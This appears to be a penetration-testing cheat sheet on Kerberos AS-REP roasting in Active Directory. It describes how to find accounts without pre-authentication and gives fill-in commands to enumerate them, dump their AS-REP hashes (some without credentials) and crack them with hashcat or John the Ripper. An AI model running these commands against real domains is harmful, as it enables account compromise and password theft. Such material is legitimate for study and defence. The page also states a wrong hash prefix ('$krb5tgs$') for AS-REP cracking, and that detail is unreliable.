Exploitation - Kerberos AS_REP roasting
Overview
An ASP_REP roasting attack is an attack on the Kerberos
authentication protocol that involves compromising the password of an user account that do not require Kerberos
pre-authentication.
The attack is based on the fact that the KRB_AS_REP
response, in reply from the KDC (Key Distribution Center)
for an initial authentication request KRB_AS_REQ
to the Authentication Service (AS)
, contains ciphertext encrypted using the client's secret key.
By default, the KRB_AS_REQ
must include a timestamp encrypted with the client's secret key, in order to permit the verification of the user identity before the KDC
returns a KRB_AS_REP
response. This verification is omitted for user accounts that do not require Kerberos
pre-authentication, i.e accounts with the account property DONT_REQ_PREAUTH
. These user accounts secrets are exposed to offline cracking, against the ciphertext, attack that are much faster and can not be time restricted.
Automated DONT_REQ_PREAUTH user accounts discovery and export of AS-REP responses
The following tools can be used to automate the discovery of user accounts that do not require Kerberos
pre-authentication and the request and export of KRB_AS_REQ
response for offline cracking.
In order to enumerate the domain user accounts, Rubeus
/ GetNPUsers.py
must be started in a domain authenticated security context or provided with working domain credentials.
Rubeus.exe asreproast /outfile:<FILE>
Rubeus.exe asreproast /format:john /outfile:<FILE>
Rubeus.exe asreproast /creduser:'<DOMAIN_FQDN>\<USERNAME>' /credpassword:'<PASSWORD>' /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /outfile:<FILE_PATH>
# Will attempt to request a TGT for all users.
GetNPUsers.py -request <DOMAIN>/<USERNAME>[:<PASSWORD>]
DONT_REQ_PREAUTH user accounts discovery
The following tools can be used to discover user accounts that do not require Kerberos
pre-authentication:
Get-ADUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-ADUser -Server <DC_HOSTNAME | DC_IP> -Credential <PSCredential> -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-NetUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-NetUser -Server <DC_HOSTNAME | DC_IP> -Credential <PSCredential> -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Request and export of KRB_AS_REP responses
The following tools can be used to request and export KRB_AS_REP
for user accounts that do not require Kerberos
pre-authentication.
The following operations do not require the knowledge of valid credentials.
Rubeus.exe asreproast /user:<USERNAME> /outfile:<FILE>
Rubeus.exe asreproast /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /user:<USERNAME> /outfile:<FILE>
GetNPUsers.py '<DOMAIN>/' -usersfile <USERNAMES_FILE>
GetNPUsers.py '<DOMAIN>/' -dc-ip <DC_HOSTNAME | DC_IP> -usersfile <USERNAMES_FILE> -format john
Offline cracking of KRB_AS_REP responses
Both John the Ripper
(magnumripper fork) and hashcat
can be used to crack the KRB_AS_REP
responses.
The hash needs to respect the following format to be recognized hashcat
:
# ENCRYPTION_TYPE 23 = RC4
# ENCRYPTION_TYPE 17 = AES128
# ENCRYPTION_TYPE 18 = AES256
$krb5tgs$<ENCRYPTION_TYPE>$*<USERNAME>@<DOMAIN>:$85DA[...]
Depending on the tool used, the hash retrieved may need to be manually updated.
The following commands can be used to crack the KRB_AS_REP
responses:
# Its recommended to use Hashcat on a Windows OS for better performance due to driver compatibility
hashcat64.exe -m 18200 -a 0 [-r <RULE_FILE>] '[<HASH> | <HASHFILE>]' <WORDLIST>
john --wordlist=<WORDLIST> <HASHFILE>
References
https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ https://tools.ietf.org/html/rfc4120#page-60 https://beta.hackndo.com/kerberos-asrep-roasting/ https://adsecurity.org/?p=227
Last updated